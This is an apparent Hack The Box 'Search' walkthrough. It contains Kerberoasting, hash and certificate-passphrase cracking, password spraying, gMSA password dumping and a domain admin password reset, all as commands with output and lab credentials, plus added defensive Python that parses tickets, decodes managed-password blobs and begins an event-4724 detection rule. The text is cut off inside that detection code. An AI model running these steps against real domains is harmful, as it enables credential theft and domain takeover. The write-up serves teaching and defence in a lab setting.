┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ impacket-GetUserSPNs -request -usersfile dom_userlist.txt -dc-ip research.search.htb 'search.htb/hope.sharp:IsolationIsKey?' 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$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
[-] Principal: Santino.Benjamin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
...
[-] Principal: Jordan.Gregory - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3f
ac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8
[-] Principal: Tristan.Davies - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal:  - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Now, with the TGS ticket for web_svc in hand, let's try to crack it:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ echo '$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$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' > web_svc-krb
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt web_svc-krb 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)     
1g 0:00:00:11 DONE (2022-04-22 14:52) 0.08960g/s 1029Kp/s 1029Kc/s 1029KC/s @4208891ncv..@#alexandra$&
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
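
The GetUserSPNs output above contains two different ticket layouts: the krbtgt line is an etype 18 (AES-256) ticket, while the web_svc line is etype 23 (RC4-HMAC), which is the one john loads as "krb5tgs etype 23" and cracks in seconds because it is keyed with the unsalted NT hash of the account password. The parser below is an added example, not code from the write-up or from impacket, and it splits each krb5tgs line into its fields so a defender reviewing such output can see which accounts still issue RC4 tickets. The sample lines are constructed in the same layout as the real ones, with the long encrypted payloads replaced by short made-up hex.

```python
import re
from typing import Dict, List, Optional

# Hash layouts emitted by impacket-GetUserSPNs (john/hashcat "krb5tgs" format).
# etype 23 (RC4-HMAC):    $krb5tgs$23$*account$REALM$spn*$checksum(16 bytes)$edata
# etype 17/18 (AES-CTS):  $krb5tgs$18$account$REALM$*spn*$checksum(12 bytes)$edata
_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*([^$*]+)\$([^$*]+)\$([^$*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")
_AES_RE = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$*]+)\$([^$*]+)\$\*([^$*]+)\*\$([0-9a-fA-F]{24})\$([0-9a-fA-F]+)$")

ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def parse_krb5tgs(line: str) -> Optional[Dict[str, object]]:
    """Split one krb5tgs hash into its fields; None if the line is not one."""
    line = line.strip()
    m = _RC4_RE.match(line)
    if m:
        account, realm, spn, checksum, edata = m.groups()
        etype = 23
    else:
        m = _AES_RE.match(line)
        if not m:
            return None
        etype_s, account, realm, spn, checksum, edata = m.groups()
        etype = int(etype_s)
    return {
        "etype": etype,
        "cipher": ETYPE_NAMES[etype],
        "account": account,
        "realm": realm,
        "spn": spn,
        "checksum_bytes": len(checksum) // 2,
        "edata_bytes": len(edata) // 2,
        # RC4 tickets are keyed with the NT hash of the account password, so they
        # are what an offline wordlist attack targets; krbtgt's key is random, so
        # its ticket is never a realistic cracking target regardless of etype.
        "offline_crack_risk": etype == 23 and account.lower() != "krbtgt",
    }


def triage_roast_output(lines: List[str]) -> Dict[str, List[str]]:
    """Summarise GetUserSPNs output: accounts that issued RC4 tickets, accounts
    that issued AES tickets, and lines that are just tool noise."""
    report: Dict[str, List[str]] = {"rc4_accounts": [], "aes_accounts": [], "ignored": []}
    for raw in lines:
        parsed = parse_krb5tgs(raw)
        if parsed is None:
            report["ignored"].append(raw.strip())
        elif parsed["etype"] == 23:
            report["rc4_accounts"].append(str(parsed["account"]))
        else:
            report["aes_accounts"].append(str(parsed["account"]))
    return report


# Constructed sample: same layout as the two tickets above, payloads shortened.
SAMPLE_OUTPUT = [
    "[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)",
    "$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$00112233445566778899aabbccddeeff",
    "$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$deadbeefcafebabe0123456789abcdef",
]

if __name__ == "__main__":
    for entry in SAMPLE_OUTPUT:
        print(parse_krb5tgs(entry))
    print(triage_roast_output(SAMPLE_OUTPUT))
```

Accounts that show up under rc4_accounts are the ones to fix on the defensive side: a long random password (or a managed service account) makes the ticket uncrackable, and enabling AES-only encryption types on the account removes the RC4 ticket altogether.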

After cracking the ticket, the web_svc credentials led nowhere: the account has the same level of access as hope.sharp. Let's use the recovered password for password spraying and see whether another account shares it:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u dom_userlist.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Administrator:@3ONEmillionbaby STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Marshall.Skinner:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Edgar.Jacobs:@3ONEmillionbaby 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Elisha.Watts:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\:@3ONEmillionbaby STATUS_LOGON_FAILURE 

We found another user with the same password as web_svc: Edgar.Jacobs:@3ONEmillionbaby

Let's see what we can see with this account:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 
                                                                                                                                                                         

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\edgar.jacobs'%'@3ONEmillionbaby'
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\
smb: \edgar.jacobs\> ls
  .                                  Dc        0  Thu Apr  9 16:04:11 2020
  ..                                 Dc        0  Thu Apr  9 16:04:11 2020
  Desktop                           DRc        0  Mon Aug 10 06:02:16 2020
  Documents                         DRc        0  Mon Aug 10 06:02:17 2020
  Downloads                         DRc        0  Mon Aug 10 06:02:17 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> ls Desktop\
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> cd ..
smb: \> get edgar.jacobs\Desktop\Phishing_Attempt.xlsx 
getting file \edgar.jacobs\Desktop\Phishing_Attempt.xlsx of size 23130 as edgar.jacobs\Desktop\Phishing_Attempt.xlsx (124.8 KiloBytes/sec) (average 124.8 KiloBytes/sec)
smb: \> quit

As you can see, there is a "phishing"-related spreadsheet we need to inspect. For this I did not go fancy and simply opened it in Google Sheets:

The spreadsheet gives what looks like a usable set of usernames and passwords, so let's compose new user and password lists from it and test them once more:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u phishUser -p phishPass --continue-on-success     
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE 

And we just found a valid credential: SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

Let's use this account, first checking its share access through smbmap:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d SEARCH     
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\Sierra.Frye'%'$$49=wide=STRAIGHT=jordan=28$$18'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Apr 22 17:00:50 2022
  ..                                 Dc        0  Fri Apr 22 17:00:50 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> recurse 
smb: \> ls sierra.frye\
  .                                  Dc        0  Wed Nov 17 20:01:46 2021
  ..                                 Dc        0  Wed Nov 17 20:01:46 2021
  Desktop                           DRc        0  Wed Nov 17 20:08:00 2021
  Documents                         DRc        0  Fri Jul 31 10:42:19 2020
  Downloads                         DRc        0  Fri Jul 31 10:45:36 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                          ARc       34  Fri Apr 22 09:32:25 2022

\sierra.frye\Documents
  .                                 DRc        0  Fri Jul 31 10:42:19 2020
  ..                                DRc        0  Fri Jul 31 10:42:19 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      402  Fri Jul 31 10:42:19 2020

\sierra.frye\Downloads
  .                                 DRc        0  Fri Jul 31 10:45:36 2020
  ..                                DRc        0  Fri Jul 31 10:45:36 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  Backups                           DHc        0  Mon Aug 10 16:39:17 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:18 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020

\sierra.frye\Documents\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\Backups
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> get user.txt 
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \sierra.frye\Desktop\> cd ..\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12 
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (15.0 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx 
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (25.0 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> quit

At this point, not only have we found the user flag without a shell, but we have also found PKCS#12 certificate files (a .pfx and a .p12) in the Backups folder.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat user.txt 
ab0459********************bea8e6

When we try to inspect the certificate file, we cannot: it was exported with a passphrase that protects the private key, so we crack that passphrase first.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ openssl pkcs12 -info -in staff.pfx 
Enter Import Password:
Can't read Password
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john staff.pfx > staff_pfx
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt staff_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (staff.pfx)     
1g 0:00:03:39 DONE (2022-04-22 17:16) 0.004549g/s 24952p/s 24952c/s 24952C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john search-RESEARCH-CA.p12 > search_p12

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt search_p12
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (search-RESEARCH-CA.p12)     
1g 0:00:03:41 DONE (2022-04-22 17:24) 0.004518g/s 24782p/s 24782c/s 24782C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

To use these certificate files, they have to be imported into the browser, using the cracked passphrase as the import password.

This gives us a PowerShell session in the browser. Here we check and change the execution policy and load PowerView into memory for later use:

Privilege Escalation

While enumerating directories we bump into the home directory of what seems to be a group managed service account (gMSA):

PS C:\users> ls

    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        3/23/2020   7:20 AM                .NET v4.5                                                             
d-----        3/23/2020   7:20 AM                .NET v4.5 Classic                                                     
d-----       12/20/2021   8:34 AM                Administrator                                                         
d-----        7/31/2020  10:01 AM                BIR-ADFS-GMSA$                                                        
d-r---        3/23/2020   7:07 AM                Public                                                                
d-----        4/23/2022   4:23 AM                Sierra.Frye                                                           
d-----        8/11/2020   8:45 AM                WSEnrollmentServer                                                    

PS C:\users> 

Bloodhound

With this account, we should try and enumerate the domain a little more using Bloodhound:

Using the 'Shortest Paths to Domain Admins' query, we can see that 'Sierra.Frye', through rights inherited from the ITSec group, can read the gMSA password of BIR-ADFS-GMSA. That service account has 'GenericAll' rights over 'Tristan.Davies', a domain admin, which means the account can be modified.

When we dump the gMSA password with Sierra.Frye's credentials we get the following NT hash:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l search.htb -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
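
What gMSADumper prints above is the NT hash of the gMSA's current password, which it reads from the msDS-ManagedPassword attribute; that attribute is a binary MSDS-MANAGEDPASSWORD_BLOB structure, and its first bytes (version 1, reserved 0) are what PowerShell later shows as {1, 0, 0, 0...}. The following is an added example, not code from the write-up or from gMSADumper: it parses that blob layout and derives the NT hash (MD4 over the UTF-16LE password) from it. MD4 is implemented inline because hashlib often lacks it under OpenSSL 3, and the blob is constructed here with a known password so the result can be checked; a real gMSA password is long random UTF-16 data.

```python
import struct
from dataclasses import dataclass
from typing import Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE encoded password."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):   # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):   # round 3
            a, b, c, d = d, rotl((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


@dataclass
class ManagedPasswordBlob:
    version: int
    current_password: bytes             # raw UTF-16LE, terminator removed
    previous_password: Optional[bytes]  # present only after a rotation
    query_interval_days: float
    unchanged_interval_days: float

    def current_nt_hash(self) -> str:
        return md4(self.current_password).hex()


def _read_utf16z(buf: bytes, off: int) -> bytes:
    """Read a UTF-16LE string up to its 2-byte NUL terminator, stepping two bytes
    at a time so a NUL byte inside a code unit is not mistaken for the end."""
    end = off
    while end + 2 <= len(buf):
        if buf[end:end + 2] == b"\x00\x00":
            return buf[off:end]
        end += 2
    raise ValueError("unterminated UTF-16 string in blob")


def parse_managed_password_blob(buf: bytes) -> ManagedPasswordBlob:
    # Header (MS-ADTS 2.2.19): Version, Reserved, Length, then four 16-bit offsets.
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = \
        struct.unpack_from("<HHIHHHH", buf, 0)
    if version != 1 or length != len(buf):
        raise ValueError("not a version-1 managed password blob")
    current = _read_utf16z(buf, cur_off)
    previous = _read_utf16z(buf, prev_off) if prev_off else None
    ticks_per_day = 10_000_000 * 86400   # intervals are in 100 ns units
    query = struct.unpack_from("<Q", buf, query_off)[0] / ticks_per_day
    unchanged = struct.unpack_from("<Q", buf, unchanged_off)[0] / ticks_per_day
    return ManagedPasswordBlob(version, current, previous, query, unchanged)


def build_sample_blob(password: str, days: int = 30) -> bytes:
    """Constructed blob in the layout a DC returns; demo input only."""
    pwd = password.encode("utf-16-le") + b"\x00\x00"
    cur_off = 16
    query_off = cur_off + len(pwd)
    query_off += (-query_off) % 8                    # align the two QWORDs
    unchanged_off = query_off + 8
    length = unchanged_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, length, cur_off, 0, query_off, unchanged_off)
    body = pwd + b"\x00" * (query_off - cur_off - len(pwd))
    interval = days * 86400 * 10_000_000
    body += struct.pack("<QQ", interval, interval)
    return header + body


if __name__ == "__main__":
    blob = parse_managed_password_blob(build_sample_blob("password"))
    print(blob.current_nt_hash(), blob.query_interval_days)
```

This is the same decoding the ConvertFrom-ADManagedPasswordBlob cmdlet (from the DSInternals module) performs in the PowerShell session below. The defensive takeaway is that whoever is listed in PrincipalsAllowedToRetrieveManagedPassword (here the ITSec group, via the GUI-visible "Users or groups who can read password") effectively holds the account's credential, so that list should be as small as the hosts that actually run the service.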

Back in PowerShell, we read the msDS-ManagedPassword blob, build a credential for the gMSA from it and use that credential to change Tristan.Davies' password:

PS C:\users> Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : BIR-ADFS-GMSA
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName       : BIR-ADFS-GMSA$
SID                  : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName    : 
 

PS C:\users> $gMSA = Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
PS C:\users> $data = $gMSA.'msDS-ManagedPassword'
PS C:\users> $pass = ConvertFrom-ADManagedPasswordBlob $data
PS C:\users> $user = 'BIR-ADFS-GMSA$'
PS C:\users> $creds = New-Object System.Management.Automation.PSCredential $user,$pass.SecureCurrentPassword
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test /domain}
The password does not meet the password policy requirements. Check the minimum password length, password complexity 
and password history requirements.
    + CategoryInfo          : NotSpecified: (The password do...y requirements.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
    + PSComputerName        : localhost

NotSpecified: (:String) [], RemoteException
More help is available by typing NET HELPMSG 2245.
NotSpecified: (:String) [], RemoteException

PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test1234 /domain}
The command completed successfully.

PS C:\users> 
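
The password reset above lands on the domain controller as Security event 4724 ("An attempt was made to reset an account's password") with the gMSA as the subject and a domain admin as the target. The following is an added detection example, not part of the write-up: it runs a simple rule over constructed event records, flagging resets performed by a service account (sAMAccountName ending in '$') against a human account and resets that target a privileged account. PRIVILEGED_ACCOUNTS is a hypothetical watchlist; in practice it would be fed from Tier-0 group membership.

```python
from typing import Dict, Iterable, List

# Constructed Windows Security events, reduced to the fields a SIEM normalises.
# 4724 = password reset, 4738 = account changed (often logged alongside).
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "helpdesk01", "SubjectDomainName": "SEARCH",
     "TargetUserName": "Edith.Walls", "TargetDomainName": "SEARCH", "Computer": "RESEARCH.search.htb"},
    {"EventID": 4724, "SubjectUserName": "BIR-ADFS-GMSA$", "SubjectDomainName": "SEARCH",
     "TargetUserName": "Tristan.Davies", "TargetDomainName": "SEARCH", "Computer": "RESEARCH.search.htb"},
    {"EventID": 4738, "SubjectUserName": "BIR-ADFS-GMSA$", "SubjectDomainName": "SEARCH",
     "TargetUserName": "Tristan.Davies", "TargetDomainName": "SEARCH", "Computer": "RESEARCH.search.htb"},
]

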